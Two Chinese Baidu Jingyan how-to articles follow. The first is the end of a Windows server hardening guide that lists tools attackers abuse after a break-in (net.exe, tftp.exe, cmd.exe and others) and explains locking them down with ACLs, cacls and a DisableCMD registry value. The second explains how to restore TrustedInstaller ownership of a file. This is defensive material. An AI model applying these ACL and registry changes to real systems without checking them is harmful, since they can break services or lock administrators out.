黑客通常在溢出得到shell后,来用诸如net.exe net1.exe ipconfig.exe user.exe query.exe regedit.exe regsvr32.exe 来达到进一步控制服务器的目的如:加账号了,克隆治理员了等等;这里可以将这些命令程序删除或者改名。(注重:在删除与改名时先停掉文件复制服务 (FRS)或者先将 %windir%\system32\dllcache\下的对应文件删除或改名。
也或者将这些.exe文件移动到指定的文件夹,这样也方便以后治理员自己使用。
访问控制表列ACLS控制:找到%windir%\system32下找到cmd.exe、cmd32.exe net.exe net1.exe ipconfig.exe tftp.exe ftp.exe user.exe reg.exe regedit.exe regedt32.exe regsvr32.exe 这些黑客常用的文件,在“属性”→“安全”中对他们进行访问的ACLs用户进 行定义,诸如只给administrator有权访问,假如需要防范一些溢出攻击、以及溢出成功后对这些文件的非法利用,那么只需要将system用户在 ACLs中进行拒绝访问即可。
假如觉得在GUI下面太麻烦的话,也可以用系统命令的CACLS.EXE来对这些.exe文件的Acls进行编辑与修改,或者说将他写成一个.bat批处理 文件来执行以及对这些命令进行修改。(具体用户自己参见cacls /? 帮助进行)
对磁盘如C/D/E/F等进行安全的ACLS设置从整体安全上考虑的话也是很有必要的,另外非凡是win2k,对Winnt、Winnt\System、Document and Setting等文件夹。
进行注册表的修改禁用命令解释器: (假如您觉得用⑤的方法太烦琐的话,那么您不防试试下面一劳永逸的办法来禁止CMD的运行,通过修改注册表,可以禁止用户使用命令解释器 (CMD.exe)和运行批处理文件(.bat文件)。具体方法:新建一个双字节(REG_DWord)执行 HKEY_CURRENT_USER\Software\PolicIEs\ Microsoft\Windows\System\DisableCMD,修改其值为1,命令解释器和批处理文件都不能被运行。修改其值为2,则只是禁止命令解释器的运行,反之将值改为0,则是打开CMS命令解释器。假如您赚手动太麻烦的话,请将下面的代码保存为*.reg文件,然后导入。
防止服务器被黑的技巧有哪些?
7
对一些以System权限运行的系统服务进行降级处理。(诸如:将Serv-U、Imail、IIS、Php、Mssql、Mysql等一系列以 System权限运行的服务或者应用程序换成其它administrators成员甚至users权限运行,这样就会安全得多了…但前提是需要对这些基本运行状态、调用API等相关情况较为了解. )
END
注意事项
此文仅仅是讨论防止服务器被黑简单的解决办法,因此其它办法就不在这里详述了,更多解决方法可去景安网络www.zzidc.com网站查看。
经验内容仅供参考,如果您需解决具体问题(尤其法律、医学等领域),建议您详细咨询相关
防止服务器被黑的技巧有哪些_百度经验
https://jingyan.baidu.com/article/2c8c281dd860b80008252aea.html
如何恢复 TrustedInstaller 所有者权限?听语音
浏览:0|更新:2018-04-16 17:27
我们所有的定制爱好者都知道,在替换或修改Windows中的文件之前,我们需要获得系统文件的所有权。几乎所有的Windows自定义工具都需要修改系统文件,例如,您需要编辑Explorer.exe文件以在Windows 7中自定义启动ORB,您需要编辑authui.dll文件以更改登录屏幕等。
默认情况下,内置系统帐户“ TrustedInstaller ”具有Windows Vista,Windows 7和更高版本操作系统中所有系统文件的所有权和完全控制权,因此您需要在修改或更换系统文件之前取得所有权并为您自己分配完整权限。
取得文件或文件夹的所有权非常简单。很多经验都提供了一个现成的注册表脚本,该脚本会自动在文件和文件夹上下文菜单(右键菜单)中添加一个新选项“ Take Ownership ”。因此,您只需右键单击某个文件或文件夹并选择“Take Ownership”选项,该选项会自动让您成为该文件/文件夹的所有者,并为您指定该文件/文件夹的完整权限。
现在问题来了!一旦你拥有一个文件的所有权,现在你想恢复“TrustedInstaller”作为该文件的默认所有者,你将如何做到这一点?如何将文件的所有者更改回“TrustedInstaller”?
我们从未意识到有人可能需要将文件的所有权恢复到“TrustedInstaller”,直到我们收到来自AskVG阅读器“KS”的以下评论:
我如何将权限授予TrustedInstaller?当我更改它时,TrustedInstaller已经不在可能的所有者列表中了。
这真是一个有趣的部分。一旦您拥有Windows中的文件或文件夹的所有权,如果您返回其“属性”并尝试将所有者更改回“TrustedInstaller”,您会惊讶地发现用户列表中不再存在“TrustedInstaller” 。
那么如何恢复内置系统用户“TrustedInstaller”并将其设置为文件或文件夹的默认所有者?别担心!这是解决方案。
今天在本教程中,我们将告诉您如何将Windows的文件或文件夹的默认所有者恢复为“TrustedInstaller”,如果您将其所有者更改为自己的话?
所以不浪费时间,让我们开始教程:
注意:同样的方法将适用于在注册表编辑器中还原“TrustedInstaller”作为注册表项的所有者。
方法/步骤
1.转到包含要将所有权归还给(恢复)“TrustedInstaller”的文件、文件夹或注册表项,右键单击之,并选择属性。
它会打开它的属性窗口。现在转到“ 安全 ”选项卡并单击高级按钮。在该页面中
3
对于Windows XP,Vista和Windows 7:
如上所述,转到“ 所有者 ”标签,您会看到所有者将被设置为您的用户名,并且“TrustedInstaller”不会出现在列表中。
我们将手动添加它。点击“ 编辑 ”按钮:
它会打开另一个窗口。点击“ 其他用户或群组 ”按钮。
对于Windows 8 / 8.1,Windows 10和更高版本:
点击高级安全窗口中用户帐户名称旁边的“ 更改 ”按钮。
4
4.现在键入
NT SERVICE\TrustedInstaller
并点击确定
5
它会立即将“TrustedInstaller”添加到用户列表中。点击应用按钮。
6
Windows将显示一个消息框,单击确定按钮关闭它。再次单击所有打开的窗口中的确定按钮,您已成功恢复“TrustedInstaller”作为文件或文件夹的默认所有者。
您可以通过打开文件或文件夹属性来检查并确认所有者,您将看到“TrustedInstaller”已成为该文件或文件夹的所有者。